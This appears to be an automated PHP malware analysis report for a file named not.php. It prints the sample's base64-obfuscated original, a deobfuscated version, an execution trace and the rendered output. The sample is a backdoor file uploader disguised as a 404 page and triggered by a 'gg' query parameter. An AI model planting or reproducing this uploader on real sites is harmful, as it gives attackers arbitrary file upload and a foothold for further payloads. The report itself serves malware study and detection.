PHP Malware Analysis

not.php

md5: 1c948875d7f6a9a117360edb2f4f3283


Attributes

Encoding

Files

Input

Title


Deobfuscated PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php 
echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p>
</body></html>
<?php 
if (isset($_GET["gg"])) {
    echo "\"<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>\"";
    @copy($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "<a href=" . $_FILES['f']['name'] . ">" . $_FILES['f']['name'] . "</a>";
}

Execution traces

data/traces/1c948875d7f6a9a117360edb2f4f3283_trace-1676250029.6923.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:00:55.590093]
1	0	1	0.000128	393512
1	3	0	0.000190	396600	{main}	1		/var/www/html/uploads/not.php	0	0
1	3	1	0.000207	396600
			0.000233	314224
TRACE END   [2023-02-12 23:00:55.590224]


Generated HTML code

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /not.php was not found on this server.</p>

</body></html>

Original PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI'];
 ?> was not found on this server.</p>
</body></html>
<?php
if(isset($_GET["gg"])){
 echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI="));
 @copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);
 echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");
}